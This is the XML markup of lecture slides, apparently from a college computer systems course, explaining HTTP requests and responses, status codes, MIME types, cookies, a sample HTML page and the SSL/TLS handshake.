          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7500344" y="395670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17004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Ports and Service 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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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server: 7/echo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22/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email server: 25/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smtp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web servers: 80/http or 443/https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8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</a:t>
            </a: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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/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</a:rPr>
              <a:t>/classes/cs105/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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Specify what content they want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1D851-DACD-DD72-376F-7201B2C002DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="25908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http://www.cs.pomona.edu:80/classes/cs105/index.html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68186-51C2-8F6A-AB85-263FCC7AC615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4525108" y="2614246"/>
            <a:ext cx="347589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9C4BE-40CB-4961-03EE-A41CD955738C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="29601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prefix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F3150-F79F-0D85-35E4-CAB07ADDC048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785446" y="2614246"/>
            <a:ext cx="3739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3FC5B-CBCC-6D5F-4E8E-FCC905697862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5869431" y="2965719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suffix</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12974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04800" y="1673352"/>
            <a:ext cx="4184650" cy="4718304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HTTP/2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>RFC 7540, 2015</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Includes protocol negotiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>HTTP/1.1 still in use (RFC 2616, 1999)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>HTTP/3 published 2022, ~30%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/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217219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17219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217219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6019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6019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6019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132DA6-61D3-BD44-BC93-4B491F51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16601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HTTP request is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET, POST, OPTIONS, HEAD, PUT, DELETE,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TRACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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</a:rPr>
              <a:t>&lt;version&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is HTTP version of request (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1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</a:rPr>
              <a:t>HTTP/2.0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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>followed by zero or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>content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separates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200 	OK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301	Moved		Provide alternate URL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404	Not found	Server couldn’t find the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="97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Content-Type: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Content-Length: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669B-5075-2243-8BCD-290EB0F8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990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is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48506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715F-6712-8444-A4EF-2DCEBFFF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AB77E-20D7-4540-B262-039E1CDAC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Request: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 Response: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71717-DD65-C642-9F12-3C6D75A48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81102"/>
            <a:ext cx="7345680" cy="3153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9D50C-A56E-7747-98C4-A10FDC603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98668"/>
            <a:ext cx="7345680" cy="12242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F79E2-A6CA-D24A-8B23-53887B76A10F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2076220" y="1600200"/>
            <a:ext cx="5612138" cy="1298643"/>
            <a:chOff x="2076220" y="1600200"/>
            <a:chExt cx="5612138" cy="12986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20F0B27-372A-BA4E-8DD7-F9C371295C4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2076220" y="1600200"/>
              <a:ext cx="5612138" cy="767800"/>
              <a:chOff x="2076220" y="1600200"/>
              <a:chExt cx="5612138" cy="76780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035D95-02B4-264A-9A48-2E808A5EC2D5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1877437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Request Method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B2B907-3F11-0E45-BC12-0B580FD625B6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4940676" y="1600200"/>
                <a:ext cx="659155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Path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FF110D-9268-8C43-BA1E-FD90E2B9526F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5823680" y="1600200"/>
                <a:ext cx="1864678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Protocol Version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8E06986-6F8D-7248-8188-1F45EDAB3AB4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="2076220" y="1969532"/>
                <a:ext cx="1758099" cy="3604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F16454C-D48A-CE47-9170-20D0D8B2F765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2350540" y="1969532"/>
                <a:ext cx="2919714" cy="3984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2B0CC5E-F13B-F545-A2A4-07AB1F5A9C27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3415221" y="1969532"/>
                <a:ext cx="3340798" cy="3604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221039-3239-B84A-A97C-A06CCF74BF7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6441122" y="2514600"/>
              <a:ext cx="110267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Headers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A800318-CE0F-964D-82AD-8E50C18BC2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37760" y="2621280"/>
              <a:ext cx="1510042" cy="863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F169A17-C437-2F41-ACDF-EFE1772C6F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8600" y="2736810"/>
              <a:ext cx="2402522" cy="1620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93E027-0044-9B40-93F8-DC6951AAA27B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5486400" y="4038600"/>
            <a:ext cx="2667000" cy="2514600"/>
            <a:chOff x="5486400" y="4038600"/>
            <a:chExt cx="2667000" cy="2514600"/>
          </a:xfrm>
        </p:grpSpPr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24B4C471-3054-D446-9807-E53AB7E4AFBE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6756019" y="4038600"/>
              <a:ext cx="236442" cy="2057400"/>
            </a:xfrm>
            <a:prstGeom prst="righ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753F17-D44D-AA4C-AC5A-64715AB7A267}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7050722" y="4882634"/>
              <a:ext cx="110267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Header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DC322E-6DA6-A547-8243-E3D83725A442}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7050722" y="5942585"/>
              <a:ext cx="72167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Body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E099747-687C-0D4F-98B8-5E94E1E860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400" y="6164795"/>
              <a:ext cx="1564322" cy="38840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32739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content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text/html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text/plain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image/gif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/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>image/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Binar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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b="0" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>www.iana.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/assignments/media-types/media-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>types.xhtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="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2753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1294" tIns="45647" rIns="91294" bIns="45647">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The content returned in HTTP responses can be either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>static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dynamic</a:t>
            </a:r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pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bottom line: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Web content is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186345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&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;meta charset="utf-8"&gt;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&lt;title&gt;CS 105 - Spring 2024&lt;/title&gt;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='https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>fonts.googleapis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css?family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>=Source+Sans+Pro:300,300i,600,700,700i' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>='stylesheet' type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>'&gt;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='https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>fonts.googleapis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css?family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>=Inconsolata:400,700,700i' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>='stylesheet' type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>'&gt;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="resources/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>bootstrap.min.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="stylesheet"&gt;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rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="stylesheet" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="resources/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>main.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;header class="site-header"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;div class="navbar navbar-inverse navbar-fixed-top"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;div class="container-fluid"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>            &lt;div class="navbar-header"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                &lt;button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                    &lt;span class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>-only"&gt;Toggle navigation&lt;/span&gt;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&lt;/button&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                &lt;a class="navbar-brand"&gt; CS 105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>		  &lt;span class="hidden-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>xs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> hidden-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt;: Computer Systems&lt;/span&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>		  &lt;span class="hidden-md hidden-lg"&gt; - Spring 2024&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>		&lt;/a&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>            &lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76116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0BB9-5223-C84A-BA02-08BD8C92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Web Pages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3DE9-3441-4C4B-9898-EE90AD3CD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Server-Side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F7526-DA63-844E-A3E0-3AEDB77593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PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ruby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ADDAF-3227-A943-99A0-2AE80F4A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Client-Side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1CE70F-3326-B748-B8A8-84EC08B82C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9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0447"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="1975104"/>
            <a:ext cx="3733800" cy="34036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EF94-D3A1-E460-DDEF-1353B63F0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4196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Cookies are small blocks of data stored locally by the web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie is sent with every request to that domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be used to keep track of whether a user has authenticated (as which user)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And also other things…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be set by third parties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10591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“\n” instead of “\r\n”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="505901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6817-97E3-E956-7E0E-D3CDDF70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/>
              <a:t>What can go wrong…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="997623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Socket Layer (SSL)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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSL 2.0 (1995): designed by Netscape, contains a number of security flaws, prohibited since 2011</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TLS 1.3 (2018): drops insecure features and introduces additional cipher suites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85787-13DA-8AB4-F482-46BE93909AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1056540" y="237245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69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SSL/TLS Handshake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0" y="2590800"/>
            <a:ext cx="0" cy="388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563631"/>
            <a:ext cx="0" cy="3886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86000" y="2563631"/>
            <a:ext cx="4191000" cy="369332"/>
            <a:chOff x="2286000" y="2563631"/>
            <a:chExt cx="4191000" cy="36933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86000" y="2895600"/>
              <a:ext cx="419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9000" y="2563631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ClientHello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0" y="3087420"/>
            <a:ext cx="4191000" cy="369332"/>
            <a:chOff x="2286000" y="3087420"/>
            <a:chExt cx="4191000" cy="36933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286000" y="3419389"/>
              <a:ext cx="4191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29000" y="308742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ServerHello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0" y="3617433"/>
            <a:ext cx="4191000" cy="369332"/>
            <a:chOff x="2286000" y="3617433"/>
            <a:chExt cx="4191000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286000" y="3949402"/>
              <a:ext cx="4191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429000" y="3617433"/>
              <a:ext cx="2287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ServerKeyExchange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86000" y="4131248"/>
            <a:ext cx="4191000" cy="369332"/>
            <a:chOff x="2286000" y="4131248"/>
            <a:chExt cx="4191000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286000" y="4463217"/>
              <a:ext cx="419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429000" y="4131248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ClientKeyExchange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8163" y="2630269"/>
            <a:ext cx="173269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Version, cipher suites, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rClient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25506" y="2743200"/>
            <a:ext cx="173269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Version, cipher suite, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>certificate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278551"/>
            <a:ext cx="18160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Enc_pks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ms_p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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163" y="4876800"/>
            <a:ext cx="173269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Compute shared secret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8082" y="4869543"/>
            <a:ext cx="173269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Compute shared secret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5506" y="3766644"/>
            <a:ext cx="17326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(optional)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0" y="5318183"/>
            <a:ext cx="4191000" cy="369332"/>
            <a:chOff x="2286000" y="2563631"/>
            <a:chExt cx="4191000" cy="36933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286000" y="2895600"/>
              <a:ext cx="4191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29000" y="2563631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ChangeCipherSpec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6000" y="5841972"/>
            <a:ext cx="4191000" cy="369332"/>
            <a:chOff x="2286000" y="3087420"/>
            <a:chExt cx="4191000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286000" y="3419389"/>
              <a:ext cx="4191000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429000" y="3087420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ChangeCipherSpec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18" descr="toshiba_satellite_a105_s4284_laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99102DBC-FEB5-5B12-BB98-43F22706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33" y="1415811"/>
            <a:ext cx="1184767" cy="11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S15serverfront">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C422C541-1935-C9AE-79F3-D8286EE5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532" y="1866461"/>
            <a:ext cx="1918635" cy="66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2A75151A-F7FC-ADF8-13B3-667971D39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0843" y="1968550"/>
            <a:ext cx="557401" cy="557401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 4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98D49BF-31B7-0321-DA13-EEEAA0AF3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22089"/>
            <a:ext cx="1617690" cy="5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905D-903D-3542-B552-FB7BC97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up the Network Stack…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A424F-0B06-1646-B0AB-CCD11D666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2061207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5107-A19D-AE37-EF47-E84DE38A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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder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2D13E98-75D7-50BD-1B12-119C28EADE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350"/>
            <a:ext cx="8229600" cy="3995960"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260424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by Year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BAAF2C8-DB31-7F70-DA42-21DCEF192C65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1524000"/>
          <a:ext cx="82296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959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Vulnerability Occurrence in Applications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83CF4B-8722-424F-ADC0-6C08284531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273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(SOP)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for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dir</a:t>
            </a:r>
            <a:r>
